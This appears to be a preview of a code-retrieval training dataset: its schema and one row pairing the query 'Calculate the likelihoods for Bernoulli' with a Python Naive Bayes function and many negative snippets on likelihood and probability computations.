Dataset columns (name: type, observed range):

query: string, lengths 9 to 3.4k
document: string, lengths 9 to 87.4k
metadata: dict
negatives: list, lengths 4 to 101
negative_scores: list, lengths 4 to 101
document_score: string, lengths 3 to 10
document_rank: string, 102 distinct values
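Two sample rows follow, with field values printed in the schema order above. Each row pairs a query with one positive document and a list of mined negative documents, and the per-row metadata declares a single triplet objective over (query, document, negatives). A minimal sketch of expanding one row into training triplets, assuming only the field names in the schema (the row variable is a plain dict here):

def iter_triplets(row):
    # Yield one (anchor, positive, negative) triplet per mined negative,
    # matching the declared objective ["query", "document", "negatives"].
    for negative in row["negatives"]:
        yield row["query"], row["document"], negative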
Calculate the likelihoods for Bernoulli
def calculate_likelihoods_bernoulli(data, labels, vocab):
    classes = set(labels)
    likelihoods = {}
    # Calculate likelihood for each class
    for cls in classes:
        # Reduce each document with this label to the set of word types it contains
        documentsInClass = [set(map(lambda y: y[0], data[x]))
                            for x in range(len(data)) if labels[x] == cls]
        numDocsInClass = len(documentsInClass)
        results = {}
        for word in vocab:
            # Binary variable -- either present or not present.
            # (The original len(filter(...)) works only on Python 2; count explicitly.)
            numDocsWithWordInClass = sum(1 for doc in documentsInClass if word in doc)
            results[word] = laplace_smooth(numDocsWithWordInClass, numDocsInClass, 2)
        # Special Laplace smoothing for words not found in training data
        results[None] = laplace_smooth(0, numDocsInClass, 2)
        likelihoods[cls] = results
    return likelihoods
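The function relies on a laplace_smooth helper that the snippet does not define. A minimal sketch, assuming the conventional add-alpha formulation in which the third argument is the number of possible outcomes (2 for the present/absent Bernoulli case above); the name and signature are taken from the call sites, everything else is an assumption:

def laplace_smooth(count, total, num_outcomes, alpha=1.0):
    # Add-alpha smoothing: never returns 0, even for unseen events.
    # laplace_smooth(k, n, 2) gives (k + 1) / (n + 2) for a binary feature.
    return (count + alpha) / (total + alpha * num_outcomes)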
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_prob_mle(X: np.ndarray, n: int) -> float:\n\n assert n > 1, \"for n = 1 use Bernoulli distribution.\"\n Binomial._check_input_data(X=X)\n Binomial._check_support(X=X, n=n)\n\n prob = X.mean() / n\n return prob", "def likelihood(self, data, hypo):\n tagged, n, k = data\n if hypo < tagged + n - k:\n return 0\n\n p = tagged / hypo\n like = thinkbayes.eval_binomial_pmf(k, n, p)\n return like", "def likelihood(params,data):\n spec, isnflux, igalflux = data\n chi2=0\n modflux = (params[0]*isnflux + params[1]*igalflux)\n chi2 += sum((spec.flux - modflux)**2)/((0.05*sum(spec.var)**2)/2.0)\n return np.exp(-chi2/2.0)", "def likelihood(self):\n \n raise NotImplementedError()", "def bayesian_info_criterion(log_likelihood, n_params, n_samples):\n return n_params * np.log(n_samples) - 2.0 * log_likelihood", "def multinomial_likelihood(m_true, alpha, alpha0, m_probs):\n\n ll = tf.reduce_sum(input_tensor=m_true * (tf.math.log(alpha0) - tf.math.log(alpha)), axis=1, keepdims=True)\n ll = tf.reduce_mean(input_tensor=ll)\n return ll", "def calculateBernoulli(x, mean, stdev):\n\t\t\tif x:\n\t\t\t\tprob = mean\n\t\t\telse:\n\t\t\t\tprob = 1-mean\n\t\t\treturn prob", "def _compute_likelihood(self, mus, pmfs):\n expected_counts = pmfs.copy()\n for mu, _p_bin_source in zip(mus, expected_counts):\n _p_bin_source *= mu # Works because of numpy view magic...\n expected_total = np.sum(expected_counts, axis=0)\n\n observed_counts = self.data_events_per_bin.histogram\n\n ret = observed_counts * np.log(expected_total) - expected_total - gammaln(observed_counts + 1.).real\n return np.sum(ret)", "def get_log_likelihood(response_probability, response):\n pass", "def likelihood(mean, logs, x):\n return -0.5 * (logs * 2. + ((x - mean) ** 2) / np.exp(logs * 2.) + GaussianDiag.Log2PI)", "def log_marginal_likelihood(X_train,y_train,phi,tau=1.,Ve=1.e-10):", "def BernoulliExponentialLoss(lamb) :\n def bexl(x, p) :\n N = K.int_shape(p)[1]\n recon = N*metrics.binary_crossentropy(x, p)\n dkl = K.sum((-1./lamb) + K.log(lamb) - 1, axis=-1)\n return recon+dkl\n return bexl", "def forward(self, xs, like_params, nan_mask=None):\n\t\tassert len(like_params) == 1, f\"BernoulliLikelihood only takes\" \\\n\t\t\t\t+ f\" a single parameter. Found {len(like_params)}.\"\n\t\t# Unwrap the single parameter tuple.\n\t\tlike_params = like_params[0] # [b,s,m,m_dim]\n\t\tassert len(like_params.shape) == 4, f\"len({like_params.shape}) != 4\"\n\t\txs = xs.unsqueeze(1) # [b,1,m,m_dim]\n\t\tdist = Bernoulli(logits=like_params)\n\t\tlog_probs = dist.log_prob(xs).sum(dim=3) # [b,s,m]\n\t\tif nan_mask is not None:\n\t\t\ttemp_mask = (~nan_mask).float().unsqueeze(1).expand(log_probs.shape)\n\t\t\tassert temp_mask.shape == log_probs.shape, \\\n\t\t\t\t\tf\"{temp_mask.shape} != {log_probs.shape}\"\n\t\t\tlog_probs = log_probs * temp_mask # [b,s,m]\n\t\treturn log_probs", "def bernoulli(p):\n bern = rn.binomial(1,p)\n return bern", "def log_likelihood_bernoulli(mu, target):\n # init\n batch_size = mu.size(0)\n mu = mu.view(batch_size, -1)\n target = target.view(batch_size, -1)\n\n # log_likelihood_bernoulli\n log_bernoulli = torch.sum(target * torch.log(mu) + (1. - target) * torch.log(1. 
- mu), dim=1)\n return log_bernoulli", "def bernoulli(n):\n\n x, res, s, c = Rat(0), Rat(0), Rat(0), Rat(-1)\n for k in range(1, n+2):\n c *= 1 - Rat(n + 2)/k\n s += x**n\n x += 1\n res += c*s/k\n return res", "def bernoulli_num(n):\n return mp.bernoulli(n)", "def logistic_function(self, data, b0, b1):\n return np.array([1/(1+exp(-1*b0+(-1*b1*x))) for x in data])", "def log_prob(self):", "def log_likelihood(data, probs):\n # Assume data is given as counts\n return _np.sum([nlogp(n, p) for n, p in zip(data, probs) if n > 0])", "def compute_prob_mle(X: np.ndarray) -> float:\n\n Bernoulli._check_input_data(X=X)\n Bernoulli._check_support(X=X)\n\n prob = X.mean()\n return prob", "def likelihood_prediction():\n # Get info\n selected_word = prompt_tech_selection()\n article_json = get_json_from_file()\n\n # Calculate results\n total_word_counter, selected_word_counter = count_occurrences(article_json, selected_word)\n probability = selected_word_counter / total_word_counter\n total_time = article_json[-1]['time'] - article_json[0]['time'] # unix subtraction = seconds\n months_in_train_set = total_time / SECONDS_IN_MONTH\n expected_posts_per_month = int(total_word_counter / months_in_train_set)\n\n # Show results\n print_text_results(expected_posts_per_month, probability, selected_word)\n plot_likelihood(expected_posts_per_month, probability)", "def bernoulli_logpmf(X, p):\n return -T.nnet.binary_crossentropy(p, X).sum(axis=-1)", "def log_likelihood(self,samples,times):\n prior_mu = np.ones(2*len(self.A)+1) \n prior_var = np.eye(2*len(self.A)+1)*0.7\n prior_p = np.log(self.prior_pdf())\n #prior_p = np.log(self.normal_prior(prior_mu,prior_var))\n xform = [self.sum_exp(t) for t in times]\n lp = scipy.stats.norm(xform,np.sqrt(self.var)).pdf(samples)\n sample_p =np.sum(np.log(lp))\n ll = prior_p + sample_p\n\n if np.isnan(ll):\n return -np.infty\n return ll", "def log_likelihood(self, data, reward_model, bias_params):", "def log_probability(self, samples):\n pass", "def BernoulliGaussianLoss(mu_kl, log_var_kl) :\n def bgl(x, p) :\n N = K.int_shape(p)[1]\n recon = N*metrics.binary_crossentropy(x, p)\n dkl = -0.5 * K.sum(-K.exp(log_var_kl) - K.square(mu_kl) + 1. 
+ log_var_kl, axis=-1)\n return dkl + recon\n return bgl", "def likelihood(self,x,params = None,**kwargs):\n return np.exp(self.log_likelihood(x,params=params,**kwargs))", "def lnprob(theta, observables):\n prior = lnprior(theta)\n if not np.isfinite(prior):\n return -inf\n return prior + lnlike(theta, observables)", "def lnprobability(self):\n return", "def likelihood(x, n, P):\n if not isinstance(n, int) or (n <= 0):\n raise ValueError('n must be a positive integer')\n if not isinstance(x, int) or (x < 0):\n raise ValueError(\n 'x must be an integer that is greater than or equal to 0')\n if x > n:\n raise ValueError('x cannot be greater than n')\n if not isinstance(P, np.ndarray) or len(P.shape) != 1:\n raise TypeError('P must be a 1D numpy.ndarray')\n if not np.all((P >= 0) & (P <= 1)):\n raise ValueError('All values in P must be in the range [0, 1]')\n nume = np.math.factorial(n)\n deno = (np.math.factorial(x) * (np.math.factorial(n - x)))\n fact = nume / deno\n P_likelihood = fact * (np.power(P, x)) * (np.power((1 - P), (n - x)))\n return P_likelihood", "def test_Bernoulli_NB_estimators():", "def binomial(n, p):\n sum_ans = 0\n for k in range(n):\n sum_ans = sum_ans + bernoulli(p)\n return sum_ans", "def calculateLogJointProbabilities(self, datum):\n logJoint = util.Counter()\n \n \"*** YOUR CODE HERE ***\"\n \n # -- OUR CODE HERE\n \n \n import math\n for label in self.legalLabels:\n sumThing = 0.0\n for pixel in self.conditionalProb[label]:\n if datum[pixel] is 1:\n #assert self.conditionalProb[label][pixel] < 1.0 # -- sanity check that the probability is valid\n sumThing += math.log((self.conditionalProb[label][pixel]*1.0))\n else:\n sumThing+=math.log(1-self.conditionalProb[label][pixel]*1.0)\n logJoint[label] = math.log(self.prior[label]*1.0) + sumThing*1.0\n \n\n \n \n import time\n #print \"logJoint is :: \", logJoint\n #time.sleep(2)\n \n \n # -- uses the conditional probability tables computed in the current iteration\n # -- in train and tune\n \n return logJoint", "def likelihood(self):\n\n # assert the Gaussian process is up to date\n self._gp_up_to_date()\n\n noise_penalization_term = -1 / 2 * np.log(\n np.linalg.det(self.cov_matrix))\n\n y = np.linalg.solve(self.cov_matrix, self.list_y)\n y = np.array(self.list_y) @ y\n data_fidelity_term = -1 / 2 * y\n\n nbr_obs_term = - self.n_observation * np.log(2 * np.pi)\n likelihood = (\n noise_penalization_term + data_fidelity_term + nbr_obs_term\n )\n return likelihood", "def log_likelihood(self, x):\n # set nuisance parameters to their central values!\n predictions = self.get_predictions(self.shortarray_to_array(x), nuisance=False)\n m_obj = flavio.Measurement['Pseudo-measurement for FastFit instance: ' + self.name]\n m_obs = m_obj.all_parameters\n prob_dict = m_obj.get_logprobability_all(predictions)\n ll = sum(prob_dict.values())\n return ll", "def naivebayesPXY_mle(x,y):\n pos_denom = x[y==1].sum()\n neg_denom = x[y==-1].sum()\n posprob = x[y==1].sum(axis = 0)/pos_denom\n negprob = x[y==-1].sum(axis = 0)/neg_denom\n return posprob, negprob", "def compute_Bayes(BIC, BIC_wo, BIC_white):\n from scipy.misc import logsumexp\n lnprob = -0.5*BIC - np.logaddexp(-0.5*BIC, -0.5*BIC_wo)\n # BIC of H1 - BIC H0\n # larger value favours H1\n logBayes = 0.5 * (-1.0*BIC + BIC_wo)\n #lnprob = np.log(1./3.) 
- 0.5*BIC - logsumexp([BIC, BIC_wo, BIC_white])\n #print(np.log(1./3.), - 0.5*BIC, - logsumexp([BIC, BIC_wo, BIC_white]))\n logprob = logBayes - logsumexp([logBayes, 1.])\n #print(\"2lnK: \", 2.0*logBayes)\n lnprob_w = -0.5 * BIC - logsumexp([-0.5*BIC, -0.5*BIC_wo, -0.5*BIC_white])\n lnprob_wo = -0.5 * BIC_wo - logsumexp([-0.5*BIC, -0.5*BIC_wo, -0.5*BIC_white])\n lnprob_white = -0.5 * BIC_white - logsumexp([-0.5*BIC, -0.5*BIC_wo, -0.5*BIC_white])\n #print(0.5 * (BIC_wo - BIC))\n #prob = np.exp(-0.5*BIC) / (np.exp(-0.5*BIC) + np.exp(-0.5*BIC_wo))\n return np.exp(lnprob_w), np.exp(lnprob_wo), np.exp(lnprob_white)", "def likelihood(alphas, sigmas, mus, x):\n if len(alphas.shape) == 0:\n alphas = np.expand_dims(alphas, 1)\n sigmas = np.expand_dims(sigmas, 1)\n k = alphas.shape[0]\n t_dim = int(mus.shape[0] / k)\n\n likelihood_ = 0.0\n\n for i in range(k):\n likelihood_t = gaussian_np(x, mus[i*t_dim:(i+1)*t_dim], sigmas[i])\n likelihood_ += alphas[i] * likelihood_t\n\n return likelihood_", "def log_likelihood(self, points):\n\t\tpoint_set = list(points)\n\t\tlog_probabilities = [np.log(self.density(point)) for point in point_set]\n\t\treturn sum(log_probabilities)", "def logistic(mu, hw, x): \n n = np.exp(- ((x-mu)/(.477*hw))**2)\n return (2. * n)/( 1 + n)", "def log_multinomial_coefficient(n, x):\n return gammaln(n + 1) - gammaln(x + 1).sum()", "def nloglikeobs(self, params):\n lambda_ = params[0]\n\n ll_output = self._LL(self.endog, rate=lambda_)\n\n return -np.log(ll_output)", "def compute_prob_mle(X: np.ndarray) -> float:\n\n Geometric._check_input_data(X=X)\n Geometric._check_support(X=X)\n\n prob = 1 / X.mean()\n return prob", "def compute_log_prob(self,params: ndarray) -> float:\n return self.compute_log_prior(params) + self.compute_log_likelihood(params)", "def test_marginal_likelihood(self):\n data = np.repeat([1, 0], [50, 50])\n marginals = []\n a_prior_0, b_prior_0 = 1.0, 1.0\n a_prior_1, b_prior_1 = 20.0, 20.0\n\n for alpha, beta in ((a_prior_0, b_prior_0), (a_prior_1, b_prior_1)):\n with pm.Model() as model:\n a = pm.Beta(\"a\", alpha, beta)\n y = pm.Bernoulli(\"y\", a, observed=data)\n trace = pm.sample_smc(2000, chains=2, return_inferencedata=False)\n # log_marginal_likelihood is found in the last value of each chain\n lml = np.mean([chain[-1] for chain in trace.report.log_marginal_likelihood])\n marginals.append(lml)\n\n # compare to the analytical result\n assert abs(np.exp(marginals[1] - marginals[0]) - 4.0) <= 1", "def probability(self, X_):\n X = np.c_[np.ones(X_.shape[0]), X_] # Add one for bias to the first columns\n probs = np.zeros(X.shape[0])\n ### YOUR CODE HERE\n z = X.dot(self.w)\n probs = log_reg.logistic(z)\n ### END CODE\n assert probs.shape == (X.shape[0],)\n return probs", "def __log_likelihood(self, params, *args):\n\t\tX, y, feature_set, lambda_reg, empirical_weights, verbose, sign = args\n\n\t\tno_example = len(X)\n\t\ttotal_logZ = 0\n\t\ttotal_logProb = 0\n\t\texpected_weights = np.zeros(len(feature_set))\n\t\tfor t in range(len(X)):\n\t\t\t# example_features = X[t], example_labels = y[t]\n\n\t\t\tpotential = np.zeros(len(X[t]))\n\t\t\tfor i in range(len(X[t])):\n\t\t\t\t#candidate_features = X[t][i], candidate_label = y[t][i]\n\t\t\t\tpotential[i] = feature_set.calc_inner_product(X[t][i], params)\n\n\t\t\t#scaling\n\t\t\tpotential = potential - np.max(potential, keepdims=True)\n\n\t\t\tfor i in range(len(X[t])):\n\t\t\t\ttotal_logProb += potential[i] * y[t][i]\n\n\t\t\tpotential, Z = self.__softmax(potential)\n\n\t\t\tfor i in 
range(len(X[t])):\n\t\t\t\tfeature_set.calc_inner_sum(expected_weights, X[t][i], potential[i])\n\n\t\t\ttotal_logZ += log(Z)\n\n\t\t# _params = feature_set.get_regularized_params(params, 'bias')\n\t\t_params = params\n\t\tlog_likelihood = total_logProb - total_logZ - (lambda_reg/2) * np.sum(np.multiply(_params,_params))\n\t\tgradients = empirical_weights - expected_weights - lambda_reg * _params\n\n\t\tglobal SUB_ITERATION_NUM\n\t\tif verbose:\n\t\t\tsub_iteration_str = ' '\n\t\t\tif SUB_ITERATION_NUM > 0:\n\t\t\t\tsub_iteration_str = '(' + '{0:02d}'.format(SUB_ITERATION_NUM) + ')'\n\t\t\tprint(' ', '{0:03d}'.format(ITERATION_NUM), sub_iteration_str, ':', log_likelihood * sign)\n\n\t\tSUB_ITERATION_NUM += 1\n\n\t\treturn sign * log_likelihood, sign * gradients", "def calculateLogJointProbabilities(self, datum):\n\tlogJoint = util.Counter()\n\t#want to calculate log(P(y)) + log(sum(P(fi|y)))\n\t#where y is a label\n\tfor label in self.legalLabels:\n\t\tlogJoint[label] = math.log(self.prior_distribution_prob[label])\n\t\tfor feature, value in datum.items():\n\t\t\tcp = self.conditional_prob[label][feature][value]\n\t\t\tif cp > 0: #condition check for values < 0 because log(0) is undefined and math domain error occurs\n\t\t\t\tlogJoint[label] += math.log(cp) #summing up\n\t\t\t\t\n\treturn logJoint", "def _compute_log_likelihood(self, parameters):\n raise NotImplementedError('')", "def likelihood(ts,w,Phi):\n a = Phi.dot(w)\n return np.exp(a*ts)*sigmoid(-a)", "def prob_logit(x):\n try:\n if len(x.shape) != 1:\n raise ValueError(\"unexpected shape of input vector\\nexpected:\" + str(1) + \", actual: \" + str(len(x.shape)))\n except ValueError as e:\n print(e)\n print()\n raise\n\n x = 1.0 * np.exp(-x)\n\n probability = np.concatenate(\n (\n (x / (1.0 + x)).reshape(x.shape[0], 1),\n (1.0 / (1.0 + x)).reshape(x.shape[0], 1)\n ),\n axis=1\n )\n\n return probability", "def __call__(self):\n\n accepted = False\n\n while not accepted:\n\n test_log10E = np.random.uniform(1, 7)\n\n test_pdf = np.random.uniform(self._min_pdf, self._max_pdf)\n\n if test_pdf < self._likelihood(10 ** test_log10E, self._index):\n\n accepted = True\n\n return 10 ** test_log10E", "def Likelihood(self, data, hypo):\n p_correct = hypo\n score = data\n\n k = self.exam.Reverse(score)\n n = self.exam.max_score\n like = thinkbayes2.EvalBinomialPmf(k, n, p_correct)\n return like", "def get_likelihood(self, observation, position, direction):\n if self.real_robot and observation == 0.0:\n return 1.0\n\n closest = self.world_model.get_closest_wall(position, direction)\n if closest == None:\n # probability of a false positive is 0\n if observation == 0.0:\n return 1.0\n else:\n return 0.0\n elif closest != None and observation == 0.0:\n # probability of missing an obstacle is 0\n return 0.0\n return norm(0, self.model_noise_rate).pdf(abs(position - closest) - observation)", "def _compute_log_likelihood(self, X, S):\n log_likelihood = 0\n for n in range(self.n_col):\n likelihood = 1\n for k in range(self.n_components):\n likelihood *= self.weights[k] \\\n * multivariate_normal(self.means[k], self.covs[k]).pdf(X[n]) \\\n * poisson(self.rates[k]).pmf(S[n])\n log_likelihood += np.log(likelihood)\n\n return log_likelihood", "def log_likelihood(y_true, y_pred):\n ll = np.sum(y_true * np.log(y_pred) - y_pred)\n return ll", "def get_log_likelihood(response_probability, observed_response):\n \n return np.log(response_probability[observed_response])", "def bernoulli(p):\r\n if np.random.random() < p:\r\n return 0\r\n else:\r\n return 1", "def 
naivebayes(x,y,xtest,naivebayesPXY):\n pos, neg = naivebayesPY(x, y)\n posprob, negprob = naivebayesPXY(x, y)\n numerator = np.dot(xtest, np.log(posprob)) + np.log(pos)\n denominator = np.dot(xtest, np.log(negprob)) + np.log(neg)\n logratio = numerator - denominator\n return logratio", "def multinomial_nll(true_counts, logits):\n counts_per_example = tf.reduce_sum(true_counts, axis=-1)\n dist = tfp.distributions.Multinomial(total_count=counts_per_example,\n logits=logits)\n return (-tf.reduce_sum(dist.log_prob(true_counts)) / \n tf.cast(tf.shape(true_counts)[0], dtype=tf.float32))", "def lnprob(theta, dtarray, dmagarray, sigmaarray):\n lp = lnprior(theta)\n\n if not np.isfinite(lp):\n #if (lp==-(10**32)):\n return -np.inf\n #return -(10**32)\n return lp +lnlike(theta, dtarray, dmagarray, sigmaarray)", "def predictionBinaryClassifier(x, beta):\n x = np.insert(x, 0, 1, axis = 1)\n probability = logisticFunction(np.dot(beta, x.T))\n func = np.vectorize(lambda x: 1 if x >=0.5 else 0)\n probability = func(probability)\n return probability", "def compute_prob_mle(X: np.ndarray, k: int) -> np.ndarray:\n\n assert k > 2, \"for k = 2 use Bernoulli distribution.\"\n Categorical._check_input_data(X=X)\n Categorical._check_support(X=X, k=k)\n\n prob = np.zeros(k)\n for x in X:\n prob[x] += 1\n prob /= prob.sum()\n\n return prob", "def log_likelihood(self, x):\n return self.log_likelihood_exp(x) + self.log_prior_nuisance_parameters(x)", "def naiveBayes(self):\n acc = 0\n #for each example in the test-set\n for d in self.dev:\n pred_good = self.prob_True\n pred_bad = self.prob_False\n #calc the probability for yes and no\n for index in range(len(d[0])):\n pred_good *= self.probs_yes[(index,d[0][index])]\n pred_bad *=(self.probs_no[(index,d[0][index])])\n pred = False\n if pred_good >= pred_bad:\n pred = True\n if pred == d[1]:\n acc +=1\n return acc/len(self.dev)", "def prob(x):\n\treturn 1. 
* bivariate_normal(x, (0., 1.2), (1., 1.), .8) + \\\n\t 1.05 * bivariate_normal(x, (.6, -1.), (1.3, .7), -.6)", "def likelihood_function(X, taus, mus, sigmas):\n N = X.shape[0] # number of data points\n get_component_prob = lambda x: component_pdfs(x, mus, sigmas)\n T = np.apply_along_axis(arr=X, func1d=get_component_prob, axis=1) # gaussian component probabilities in row format (NxK)\n taus_rep = np.tile(taus, reps=(N, 1)) # repeat tau along N-axis so elementwise product can work\n\n return np.sum(T*taus_rep, axis=1)", "def gaussian_likelihood(x, mu, log_std):\n prob = -0.5 * (((x - mu) / (tf.exp(log_std) + EPS)) ** 2 + 2 * log_std + np.log(2 * np.pi))\n return tf.reduce_sum(prob, axis=1)", "def estimate_brownian_model(trials):\n trials = tuple(trials) # Required for numba\n @jit\n def loglikelihood(m_0, m_t, v_0, v_t, v_n):\n total = 0.0\n \n for trial_i in numba.prange(len(trials)):\n trial = trials[trial_i]\n total += trial_loglikelihood(trial, m_0, m_t, v_0, v_t, v_n)\n return total\n\n\n fit = scipy.optimize.minimize(\n lambda x: -loglikelihood(*x[:2], *np.exp(x[2:])),\n [0.0, 0.0, np.log(1.0), np.log(1.0), np.log(1.0)])\n m_0, m_t = fit.x[:2]\n v_0, v_t, v_n = np.exp(fit.x[2:])\n\n return m_0, m_t, v_0, v_t, v_n", "def lnlike(params, observables, nDraws=1000000):\n #print('checking type ({}) and length ({}) of params in lnlikefxn'.format(type(params),len(params)))\n evalData=generateModelData(params, distance_standoffMid, nDraws)\n evalHist, evalBinEdges = np.histogram(evalData[:,3], tof_nBins, tof_range,\n density=True)\n logEvalHist = np.log(evalHist)\n #print(logEvalHist)\n # find what TOFs have zero observed data\n # we'll use this to handle cases where we might wind up with -inf*0\n # likelihood is fine if PDF is 0 somewhere where no data is found\n # without checks though, ln(PDF=0)=-inf, -inf*0 = nan\n # however, if PDF is 0 (lnPDF=-inf) where there IS data, lnL should be -inf\n zeroObservedIndices = np.where(observables == 0)[0]\n for idx in zeroObservedIndices:\n if logEvalHist[idx] == -inf:\n logEvalHist[zeroObservedIndices] = 0\n \n loglike = np.dot(logEvalHist,observables)\n return loglike", "def lnprob(self, p):\n\n\n\n\t\tchisq = np.sum(self.deviates(p)[-1]**2)/2.0\n\t\tN = np.sum(self.TLC.bad == 0)\n\n\t\t# sum the deviates into a chisq-like thing\n\t\tlnlikelihood = -N * np.log(self.instrument.rescaling.value) - chisq/self.instrument.rescaling.value**2\n\t\tif np.isfinite(lnlikelihood) == False:\n\t\t\tlnlikelihood = -1e9\n\n\t\t# initialize an empty constraint, which could freak out if there's something bad about this fit\n\t\tconstraints = 0.0\n\n\t\t# loop over the parameters\n\n\n\t\tfor parameter in self.parameters:\n\n\t\t\t# if a parameter is outside its allowed range, then make the constraint very strong!\n\t\t\tinside = (parameter.value < parameter.limits[1]) & (parameter.value > parameter.limits[0])\n\t\t\ttry:\n\t\t\t\tassert(inside)\n\t\t\texcept AssertionError:\n\t\t\t\tconstraints -= 1e6\n\n\t\t# return the constrained likelihood\n\t\treturn lnlikelihood + constraints", "def naiveBayesMixture(train_set, train_labels, dev_set, bigram_lambda,unigram_smoothing_parameter, bigram_smoothing_parameter, pos_prior):\n\n # TODO: Write your code here\n # return predicted labels of development set\n\n # counters for Training Phase\n ham = Counter()\n ham_bi = Counter()\n spam = Counter()\n spam_bi = Counter()\n\n for string, label in zip(train_set, train_labels):\n for i in range(len(string)):\n word = string[i]\n if i != len(string)-1:\n word_bi = string[i] + ' ' 
+ string[i+1]\n if label == 1:\n ham_bi.update({word_bi:1})\n else:\n spam_bi.update({word_bi:1})\n if label == 1:\n ham.update({word:1})\n else:\n spam.update({word:1})\n\n ham_len = 0\n for w in ham:\n ham_len += ham[w]\n spam_len = 0\n for w in spam:\n spam_len += spam[w]\n \n hambi_len = 0\n for w in ham_bi:\n hambi_len += ham_bi[w]\n spambi_len = 0\n for w in spam_bi:\n spambi_len += spam_bi[w]\n\n # labels for Development Phase\n dev_labels = []\n # dicts for P(word|ham) and P(word|spam)\n p_ham = {}\n p_spam = {}\n p_hambi = {}\n p_spambi = {}\n\n # develop likelihoods based on dev_set\n for word in ham:\n numerator = ham[word] + unigram_smoothing_parameter\n denominator = ham_len + unigram_smoothing_parameter*(len(ham))\n p_ham[word] = numerator / denominator\n for word in spam:\n numerator = spam[word] + unigram_smoothing_parameter\n denominator = spam_len + unigram_smoothing_parameter*(len(spam))\n p_spam[word] = numerator / denominator\n\n for word_bi in ham_bi:\n numerator = ham_bi[word_bi] + bigram_smoothing_parameter\n denominator = hambi_len + bigram_smoothing_parameter*(len(ham_bi))\n p_hambi[word_bi] = numerator / denominator\n for word_bi in spam_bi:\n numerator = spam_bi[word_bi] + bigram_smoothing_parameter\n denominator = spambi_len + bigram_smoothing_parameter*(len(spam_bi))\n p_spambi[word_bi] = numerator / denominator\n \n numerator = unigram_smoothing_parameter\n denominator = ham_len + unigram_smoothing_parameter*(len(ham))\n p_ham_zero = numerator / denominator\n denominator = spam_len + unigram_smoothing_parameter*(len(spam))\n p_spam_zero = numerator / denominator\n\n numerator = bigram_smoothing_parameter\n denominator = hambi_len + bigram_smoothing_parameter*(len(ham_bi))\n p_hambi_zero = numerator / denominator\n denominator = spambi_len + bigram_smoothing_parameter*(len(spam_bi))\n p_spambi_zero = numerator / denominator\n\n for string in dev_set:\n p_words_ham = math.log(pos_prior)\n p_words_spam = math.log(1 - pos_prior)\n\n p_words_hambi = math.log(pos_prior)\n p_words_spambi = math.log(1 - pos_prior)\n \n for i in range(len(string)):\n word = string[i]\n if word in p_ham:\n p_words_ham += math.log(p_ham[word])\n else:\n p_words_ham += math.log(p_ham_zero)\n if word in p_spam:\n p_words_spam += math.log(p_spam[word])\n else:\n p_words_spam += math.log(p_spam_zero)\n\n if i != len(string)-1:\n word_bi = string[i] + ' ' + string[i+1]\n if word_bi in p_hambi:\n p_words_hambi += math.log(p_hambi[word_bi])\n else:\n p_words_hambi += math.log(p_hambi_zero)\n if word_bi in p_spambi:\n p_words_spambi += math.log(p_spambi[word_bi])\n else:\n p_words_spambi += math.log(p_spambi_zero)\n\n p_ham_mix = p_words_ham*(1-bigram_lambda) + p_words_hambi*bigram_lambda\n p_spam_mix = p_words_spam*(1-bigram_lambda) + p_words_spambi*bigram_lambda\n\n dev_labels.append(p_ham_mix >= p_spam_mix)\n\n return dev_labels", "def log_likelihood(self, y_list):\n if self.lambda_mat is None:\n raise ValueError(\"Can't compute model likelihood before fitting!\")\n\n # precision prior distribution given precision hyper-parameters\n prec_distr = stats.gamma(a=self.prec_distr[0],\n scale=self.prec_distr[1] ** -1.0)\n\n # likelihood of projection matrix precision priors given\n # precision hyper-parameters\n lambda_logl = np.sum(\n prec_distr.logpdf(self.lambda_mat['alpha']\n / self.lambda_mat['beta'])\n )\n\n # likelihood of projection matrix values given their precision priors\n a_logl = np.sum(\n stats.norm(loc=0, scale=(self.lambda_mat['beta']\n / self.lambda_mat['alpha']))\n 
.logpdf(self.A_mat['mu'])\n )\n\n # likelihood of latent feature matrix given kernel matrix,\n # projection matrix, and standard deviation hyper-parameter\n h_logl = np.sum(\n stats.norm(loc=self.A_mat['mu'].transpose() @ self.kernel_mat,\n scale=self.sigma_h)\n .logpdf(self.H_mat['mu'])\n )\n\n # likelihood of bias parameter precision priors given\n # precision hyper-parameters\n weight_prior_logl = np.sum(\n prec_distr.logpdf(np.array(self.weight_priors['alpha'])\n / np.array(self.weight_priors['beta']))\n )\n\n # likelihood of bias parameters given their precision priors\n weight_logl = np.sum(\n stats.norm(loc=0, scale=(np.array(self.weight_priors['beta'])\n / np.array(self.weight_priors['alpha'])))\n .logpdf(self.weight_mat['mu'])\n )\n\n # likelihood of predicted outputs given latent features, bias\n # parameters, and latent feature weight parameters\n f_logl = np.sum(\n stats.norm(\n loc=(self.weight_mat['mu'][1:, :].transpose()\n @ self.H_mat['mu']\n + np.vstack(self.weight_mat['mu'][0, :])),\n scale=1).logpdf(self.output_mat['mu'])\n )\n\n # likelihood of actual output labels given class separation margin\n # and predicted output labels\n y_logl = np.sum(self.get_y_logl(y_list))\n\n return (lambda_logl + a_logl + h_logl\n + weight_prior_logl + weight_logl + f_logl + y_logl)", "def calculateLogJointProbabilities(self, datum):\n logJoint = util.Counter()\n \"*** YOUR CODE HERE ***\"\n\t#Adds log(P(y)) to calculate P(y|f1,f2...)\n for label in self.legalLabels:\n\t\tlogJoint[label] += math.log(self.prior[label])\n\t#Adds log(P(f1|y)), log(P(f2|y))... to calculate P(y|f1, f2...)\n for key in datum:\n\t\t#if key == (7, 3):\n\t\t\t#print self.condprobs[key, 0]\n\t\tfor label in self.legalLabels:\n\t\t\t#print str(key) + str(datum[key])\n\t\t\tlogJoint[label] += math.log(self.condprobs[key, label][datum[key]])\n return logJoint", "def likelihood_genotype(genotype, bases_all_reads, error_rates):\n likelihood = 1\n for observed_base in bases_all_reads:\n p = 0\n for base in \"ACGT-\":\n l = prob_t_N(genotype, base) * error_rates[base][observed_base]\n p += l\n likelihood *= p\n\n return likelihood", "def lnprob(params, cos2, y, yerr):\n\n # Get prior given parameters\n lp = lnprior(params)\n if not np.isfinite(lp):\n return -np.inf\n\n # Include likelihood given data\n llh = lp + lnlike(params, cos2, y, yerr)\n\n return llh", "def likelihood(\n self,\n observation: np.ndarray,\n state: np.ndarray,\n control_z: Optional[np.ndarray] = None\n ) -> np.matrix:\n pass", "def binomial(n: int, p: float) -> int:\n return sum(bernoulli_trial(p) for _ in range(n))", "def compute_likelihood(self, corpus: str, test_corpus: str, n: int):\n probs_per_ngram = self.compute_probabilities_per_word(corpus, n)\n test_corpus_tokens = self.tokenize(test_corpus, n)\n test_corpus_ngrams = ()\n end_i = len(test_corpus_tokens) - 1\n 